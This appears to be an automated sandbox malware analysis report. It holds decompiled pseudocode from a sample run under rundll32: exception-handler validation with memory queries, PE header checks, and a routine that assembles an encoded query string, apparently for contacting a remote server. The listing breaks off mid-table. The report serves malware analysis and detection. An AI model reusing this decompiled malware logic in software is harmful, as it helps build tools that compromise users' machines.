API String ID: 2221118986-0
Opcode ID: c04f208dd51b3f8f25003e908048c2019c888d076a1f03bfc6834f333c948759
Instruction ID: 64f453c9beb3ef88dc8943a11628591142e123233596819afac4c9776c476221
Opcode Fuzzy Hash: c04f208dd51b3f8f25003e908048c2019c888d076a1f03bfc6834f333c948759
Instruction Fuzzy Hash: 8122747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 04448055, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04448055(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x444a330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x444a378 = 1;
										__eflags =  *0x444a378;
										if( *0x444a378 != 0) {
											goto L60;
										}
										_t84 =  *0x444a330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x444a378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x444a330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x444a338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x444a334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x444a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x444a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x444a378 = 1;
							__eflags =  *0x444a378;
							if( *0x444a378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x444a338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x444a338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x444a378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x444a338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x444a330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x444a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x444a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x0444805f
0x04448062
0x04448068
0x04448086
0x00000000
0x04448086
0x04448070
0x04448079
0x0444807f
0x0444808e
0x04448091
0x04448094
0x0444809e
0x0444809e
0x044480a0
0x044480a3
0x044480a5
0x044480a5
0x044480a7
0x044480aa
0x00000000
0x00000000
0x044480ac
0x044480ae
0x04448114
0x04448114
0x04448272
0x00000000
0x04448272
0x044480b0
0x044480b0
0x044480b4
0x044480b6
0x044480b6
0x044480b6
0x044480b6
0x044480b9
0x044480ba
0x044480bd
0x044480bd
0x044480c1
0x044480c5
0x044480d3
0x044480d3
0x044480db
0x044480e1
0x044480e3
0x044480e5
0x044480f5
0x04448102
0x04448106
0x0444810b
0x0444810d
0x0444818b
0x0444818b
0x0444810f
0x0444810f
0x0444810f
0x0444818d
0x0444818f
0x04448270
0x04448270
0x00000000
0x04448195
0x04448195
0x0444819c
0x00000000
0x00000000
0x044481a2
0x044481a6
0x04448202
0x04448204
0x0444820c
0x0444820e
0x04448210
0x00000000
0x00000000
0x04448212
0x04448218
0x0444821a
0x0444821c
0x04448231
0x04448231
0x04448233
0x04448262
0x04448269
0x00000000
0x04448269
0x04448237
0x04448238
0x0444823a
0x0444823c
0x0444823c
0x0444823e
0x04448240
0x04448242
0x04448256
0x04448256
0x04448259
0x0444825b
0x0444825b
0x0444825c
0x0444825c
0x00000000
0x04448244
0x04448244
0x04448244
0x0444824d
0x0444824e
0x04448250
0x04448252
0x04448252
0x00000000
0x04448244
0x04448242
0x0444821e
0x04448225
0x04448225
0x04448227
0x00000000
0x00000000
0x04448229
0x0444822a
0x0444822d
0x0444822f
0x00000000
0x00000000
0x00000000
0x0444822f
0x00000000
0x04448225
0x044481a8
0x044481ab
0x044481b0
0x00000000
0x00000000
0x044481b9
0x044481bb
0x044481c1
0x00000000
0x00000000
0x044481c7
0x044481cd
0x00000000
0x00000000
0x044481d3
0x044481d5
0x044481de
0x044481e2
0x00000000
0x00000000
0x044481e8
0x044481eb
0x044481ed
0x00000000
0x00000000
0x044481f4
0x044481f6
0x00000000
0x00000000
0x044481f8
0x044481fc
0x00000000
0x00000000
0x00000000
0x044481fc
0x00000000
0x00000000
0x00000000
0x044480e7
0x044480e7
0x044480e7
0x044480ee
0x00000000
0x00000000
0x044480f0
0x044480f1
0x044480f3
0x00000000
0x00000000
0x00000000
0x044480f3
0x0444811b
0x0444811d
0x00000000
0x00000000
0x0444812d
0x0444812f
0x04448131
0x00000000
0x00000000
0x04448137
0x0444813e
0x0444816a
0x0444816a
0x0444816c
0x0444816e
0x04448182
0x04448184
0x00000000
0x00000000
0x00000000
0x00000000
0x04448170
0x04448170
0x04448170
0x04448179
0x0444817a
0x0444817c
0x0444817e
0x0444817e
0x00000000
0x04448170
0x04448140
0x04448140
0x04448143
0x04448145
0x04448157
0x04448157
0x0444815a
0x0444815c
0x0444815c
0x0444815d
0x0444815d
0x04448163
0x04448163
0x00000000
0x00000000
0x00000000
0x00000000
0x04448147
0x04448147
0x04448147
0x0444814e
0x00000000
0x00000000
0x04448150
0x04448150
0x04448151
0x00000000
0x00000000
0x00000000
0x04448151
0x04448153
0x04448155
0x04448168
0x00000000
0x00000000
0x00000000
0x04448168
0x00000000
0x04448155
0x044480c7
0x044480ca
0x044480cd
0x00000000
0x00000000
0x044480cf
0x044480d1
0x00000000
0x00000000
0x00000000
0x044480d1
0x04448096
0x04448098
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04448106

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: c6dfab5c96761d1f18d3cffd7f778d176244e94ee7ea6ea7094c48e704a39571
Instruction ID: b0edd438ac5ec4b08c82c68baa9d985c51b1f85bcd66b0363f0bb4b0425da665
Opcode Fuzzy Hash: c6dfab5c96761d1f18d3cffd7f778d176244e94ee7ea6ea7094c48e704a39571
Instruction Fuzzy Hash: DC61E338710A069FFF29EF29C48062AB3A5FBC5355B24842BD952D7785FB31F8428750

Uniqueness

Uniqueness Score: -1.00%

Function 04447E30, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E04447E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E04447F9B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E04448055(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E04447F40(_t55, _t66);
										_t89 = _t66 + 0x10;
										E04447F9B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E04448037(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x04447e34
0x04447e35
0x04447e36
0x04447e39
0x04447e3b
0x04447e3e
0x04447e3f
0x04447e41
0x04447e42
0x04447e43
0x04447e46
0x04447e50
0x04447f01
0x04447f08
0x04447f11
0x04447e56
0x04447e56
0x04447e5c
0x04447e62
0x04447e65
0x04447e68
0x04447e6c
0x04447e71
0x04447e76
0x04447ef6
0x00000000
0x04447e78
0x04447e78
0x04447e84
0x04447e86
0x04447ee1
0x04447ee1
0x04447ee7
0x00000000
0x04447e88
0x04447e97
0x04447e99
0x04447e9a
0x04447e9b
0x04447e9e
0x04447e9e
0x04447ea0
0x00000000
0x04447ea2
0x04447ea2
0x04447eec
0x04447ea4
0x04447ea4
0x04447ea8
0x04447eb0
0x04447eb5
0x04447eba
0x04447ec6
0x04447ece
0x04447ed5
0x04447edb
0x04447edf
0x00000000
0x04447edf
0x04447ea2
0x04447ea0
0x00000000
0x04447e86
0x04447efa
0x04447efa
0x04447efa
0x04447e76
0x04447f16
0x04447f1d

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 977922d8e9bbe2215eefbcb1cbf1ba0909d8bdd60aa7ed8d16fa4be23b7e228d
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: BF21B6729002049FEF10EF69C8C09ABF7A5FF85350B0685AADD158B246E730FA16C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 702E2274, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E702E2274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E702E23DB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E702E2495(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E702E2380(_t55, _t66);
										_t89 = _t66 + 0x10;
										E702E23DB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E702E2477(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x702e2278
0x702e2279
0x702e227a
0x702e227d
0x702e227f
0x702e2282
0x702e2283
0x702e2285
0x702e2286
0x702e2287
0x702e228a
0x702e2294
0x702e2345
0x702e234c
0x702e2355
0x702e229a
0x702e229a
0x702e22a0
0x702e22a6
0x702e22a9
0x702e22ac
0x702e22b0
0x702e22b5
0x702e22ba
0x702e233a
0x00000000
0x702e22bc
0x702e22bc
0x702e22c8
0x702e22ca
0x702e2325
0x702e2325
0x702e232b
0x00000000
0x702e22cc
0x702e22db
0x702e22dd
0x702e22de
0x702e22df
0x702e22e2
0x702e22e2
0x702e22e4
0x00000000
0x702e22e6
0x702e22e6
0x702e2330
0x702e22e8
0x702e22e8
0x702e22ec
0x702e22f4
0x702e22f9
0x702e22fe
0x702e230a
0x702e2312
0x702e2319
0x702e231f
0x702e2323
0x00000000
0x702e2323
0x702e22e6
0x702e22e4
0x00000000
0x702e22ca
0x702e233e
0x702e233e
0x702e233e
0x702e22ba
0x702e235a
0x702e2361

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 0b739ac7a1ee6923b11957c6a37ae5dd74b9eaf1313ca1353d1ad5394f460539
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 9721C4339002059FC700DF69C8849ABB7A5FF48350B8581ACE95B9B245E734FA29CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 7030A1AC, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c54a7725813e53a1d5a24e7f4bbb6e4ee102965b9a48200e8d7cf400ef85f9
Instruction ID: cc87d4cb21ce656605c65de0afe1c97c461e4de54c41f3cff17871a7447e83ce
Opcode Fuzzy Hash: 93c54a7725813e53a1d5a24e7f4bbb6e4ee102965b9a48200e8d7cf400ef85f9
Instruction Fuzzy Hash: 0D01FF2054F6D5BEC323A73DC95EC9A7F515E0273031E0ACEE5C59F523E5898A91C306

Uniqueness

Uniqueness Score: -1.00%

Function 04443B3B, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 262
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E04443B3B(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x444a018; // 0x632e214f
				asm("bswap eax");
				_t65 =  *0x444a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x444a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x444a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0x444a2d4; // 0xefd5a8
				_t3 = _t68 + 0x444b622; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0x444a02c,  *0x444a004, _t63);
				_t71 = E04441D5C();
				_t72 =  *0x444a2d4; // 0xefd5a8
				_t4 = _t72 + 0x444b662; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x444a2d4; // 0xefd5a8
					_t8 = _t139 + 0x444b66d; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E04444A8B(_t144);
				_t77 =  *0x444a2d4; // 0xefd5a8
				_t10 = _t77 + 0x444b38a; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x444a2d4; // 0xefd5a8
				_t12 = _t81 + 0x444b7b4; // 0x5348d5c
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x444b33b; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x444a31c; // 0x53495e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x444a2d4; // 0xefd5a8
					_t18 = _t135 + 0x444b8e9; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x444a32c; // 0x53495b0
				if(_t86 != 0) {
					_t132 =  *0x444a2d4; // 0xefd5a8
					_t20 = _t132 + 0x444b685; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x444a37c; // 0x5349630
				_t88 = E04445187(0x444a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x444a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x444a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x444a290, _t167, _v12);
						goto L28;
					}
					E044448C9(GetTickCount());
					_t95 =  *0x444a37c; // 0x5349630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x444a37c; // 0x5349630
					__imp__(_t99 + 0x40);
					_t101 =  *0x444a37c; // 0x5349630
					_t163 = E044439E6(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x444a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x44492ac);
					_push(_t163);
					_t107 = E04445217();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x444a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E04442DDF( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E0444470B();
						L24:
						HeapFree( *0x444a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E0444141B(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E04447309(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E044430D1(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E04444FB0(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E044430D1(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x04443b3b
0x04443b3b
0x04443b3b
0x04443b44
0x04443b49
0x04443b50
0x04443b52
0x04443b52
0x04443b5f
0x04443b6a
0x04443b6d
0x04443b78
0x04443b7b
0x04443b80
0x04443b83
0x04443b88
0x04443b8b
0x04443b97
0x04443ba4
0x04443ba6
0x04443bac
0x04443bb1
0x04443bbc
0x04443bbe
0x04443bc1
0x04443bc7
0x04443bc9
0x04443bd1
0x04443bdc
0x04443bde
0x04443be1
0x04443be1
0x04443be3
0x04443bea
0x04443bef
0x04443bfc
0x04443bfe
0x04443c03
0x04443c0b
0x04443c0e
0x04443c14
0x04443c1f
0x04443c21
0x04443c26
0x04443c2b
0x04443c2e
0x04443c33
0x04443c3e
0x04443c40
0x04443c43
0x04443c43
0x04443c45
0x04443c4c
0x04443c4f
0x04443c54
0x04443c5e
0x04443c60
0x04443c60
0x04443c63
0x04443c71
0x04443c76
0x04443c7a
0x04443c7d
0x04443e47
0x04443e4f
0x04443e5c
0x04443c83
0x04443c8f
0x04443c97
0x04443c9a
0x04443e37
0x04443e41
0x00000000
0x04443e41
0x04443ca6
0x04443cab
0x04443cb4
0x04443cc5
0x04443cc9
0x04443cd2
0x04443cd8
0x04443ce5
0x04443cec
0x04443cf5
0x04443cfb
0x04443e27
0x04443e31
0x00000000
0x04443e31
0x04443d07
0x04443d0d
0x04443d0e
0x04443d15
0x04443d18
0x04443e19
0x04443e21
0x00000000
0x04443e21
0x04443d21
0x04443d27
0x04443d30
0x04443d39
0x04443d44
0x04443d4b
0x04443d4e
